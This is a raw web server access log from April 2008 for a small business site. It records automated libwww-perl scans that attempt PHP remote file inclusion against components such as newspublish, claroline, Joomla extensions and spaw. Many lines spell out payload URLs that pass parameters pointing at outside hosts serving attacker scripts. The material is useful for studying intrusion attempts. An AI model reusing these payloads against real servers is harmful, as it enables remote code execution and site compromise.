69.72.215.178 - - [01/Apr/2008:01:05:36 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:05:36 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:05:36 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
70.85.140.90 - - [01/Apr/2008:01:05:47 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
69.93.255.250 - - [01/Apr/2008:01:05:51 -0700] "GET /auth.api.php?path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
207.58.166.231 - - [01/Apr/2008:01:06:28 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:06:33 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:06:33 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:06:33 -0700] "GET //config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:06:33 -0700] "GET //config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:06:33 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:06:33 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
89.108.66.198 - - [01/Apr/2008:01:06:41 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.66.198 - - [01/Apr/2008:01:06:41 -0700] "GET //config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.66.198 - - [01/Apr/2008:01:06:41 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:01:07:01 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:01:07:02 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:01:07:02 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.17.105.186 - - [01/Apr/2008:01:07:26 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.17.105.186 - - [01/Apr/2008:01:07:27 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:07:31 -0700] "GET /logs/access_080101.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:07:31 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:07:31 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:01:07:35 -0700] "GET /logs/access_080101.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:01:07:35 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:01:07:36 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:07:37 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:07:37 -0700] "GET //config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:07:38 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:07:50 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:08:04 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:08:04 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:08:04 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.207.2.62 - - [01/Apr/2008:01:08:57 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
200.207.2.62 - - [01/Apr/2008:01:09:03 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
200.207.2.62 - - [01/Apr/2008:01:09:04 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:09:15 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:09:16 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:01:09:20 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.66.198 - - [01/Apr/2008:01:09:42 -0700] "GET /logs/access_080101.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.66.198 - - [01/Apr/2008:01:09:42 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.66.198 - - [01/Apr/2008:01:09:42 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:10:16 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:10:20 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:10:20 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:10:21 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:10:22 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:10:22 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:10:26 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:10:29 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:10:29 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:10:51 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:10:51 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
75.118.25.104 - - [01/Apr/2008:01:11:19 -0700] "GET /auth.api.php?path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:01:11:45 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:01:11:46 -0700] "GET //skin/zero_vote/error.php?dir=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:01:11:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:12:53 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:12:53 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:12:55 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:12:57 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:12:57 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:12:57 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:01:13:18 -0700] "GET /logs/access.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:01:13:18 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.21.223.90 - - [01/Apr/2008:01:13:27 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.avedila.com/avedila/.../spread.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [01/Apr/2008:01:13:29 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.avedila.com/avedila/.../spread.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [01/Apr/2008:01:13:31 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.avedila.com/avedila/.../spread.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:13:55 -0700] "GET /logs/access_080101.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:13:55 -0700] "GET /logs/access_080101.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:13:55 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:13:55 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:13:55 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.11.67.242 - - [01/Apr/2008:01:13:55 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:01:15:54 -0700] "GET /logs/access_080101.log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:01:15:54 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 1180 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:01:15:54 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 2940 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.190.39.103 - - [01/Apr/2008:01:16:39 -0700] "GET /logs/access_080101.log/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
213.190.39.103 - - [01/Apr/2008:01:16:45 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
65.55.208.100 - - [01/Apr/2008:01:16:57 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.bsfadvisors.com"
65.55.208.100 - - [01/Apr/2008:01:16:57 -0700] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.bsfadvisors.com"
66.79.166.69 - - [01/Apr/2008:01:17:11 -0700] "GET /index.php?page=http://www.health-nutrition-business.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
92.48.74.30 - - [01/Apr/2008:01:17:55 -0700] "GET /logs/access_080201.log//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.health-nutrition-business.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
92.48.74.30 - - [01/Apr/2008:01:17:55 -0700] "GET //sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.health-nutrition-business.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
92.48.74.30 - - [01/Apr/2008:01:17:55 -0700] "GET /logs//sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.health-nutrition-business.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.93.255.250 - - [01/Apr/2008:01:17:57 -0700] "GET /logs/access.log/auth.api.php?path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.255.250 - - [01/Apr/2008:01:17:57 -0700] "GET /logs/auth.api.php?path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.255.250 - - [01/Apr/2008:01:18:00 -0700] "GET /logs/access.log/auth.api.php?path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.93.255.250 - - [01/Apr/2008:01:18:00 -0700] "GET /logs/auth.api.php?path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:01:20:54 -0700] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:01:20:54 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:01:20:55 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:21:42 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:21:43 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:21:43 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
74.50.105.133 - - [01/Apr/2008:01:23:11 -0700] "GET /logs/access_080201.log//admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.50.105.133 - - [01/Apr/2008:01:23:11 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.50.105.133 - - [01/Apr/2008:01:23:11 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
92.48.74.30 - - [01/Apr/2008:01:23:38 -0700] "GET /logs/access_080201.log//sohoadmin/program/modules/mods_full/enewsletter/includes/login.php?_SESSION[docroot_path]=http://www.health-nutrition-business.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.9.37.130 - - [01/Apr/2008:01:25:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.provolonebig.altervista.org/cmd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.bsfadvisors.com"
69.9.37.130 - - [01/Apr/2008:01:25:14 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.provolonebig.altervista.org/cmd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:25:56 -0700] "GET /logs/access_080101.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:25:56 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.72.215.178 - - [01/Apr/2008:01:25:56 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:27:29 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
190.54.28.163 - - [01/Apr/2008:01:28:04 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
190.54.28.163 - - [01/Apr/2008:01:28:09 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.207.2.62 - - [01/Apr/2008:01:28:35 -0700] "GET /logs/access_080101.log/start.php?page=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
200.207.2.62 - - [01/Apr/2008:01:28:35 -0700] "GET /start.php?page=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
200.207.2.62 - - [01/Apr/2008:01:28:36 -0700] "GET /logs/start.php?page=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
200.21.223.90 - - [01/Apr/2008:01:29:01 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [01/Apr/2008:01:29:03 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [01/Apr/2008:01:29:05 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
75.118.25.104 - - [01/Apr/2008:01:29:05 -0700] "GET /logs/access.log/auth.api.php?path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
75.118.25.104 - - [01/Apr/2008:01:29:05 -0700] "GET /logs/auth.api.php?path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:30:07 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:30:07 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
62.193.226.196 - - [01/Apr/2008:01:30:08 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:01:30:36 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://chyna.sufx.net/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.bsfadvisors.com"
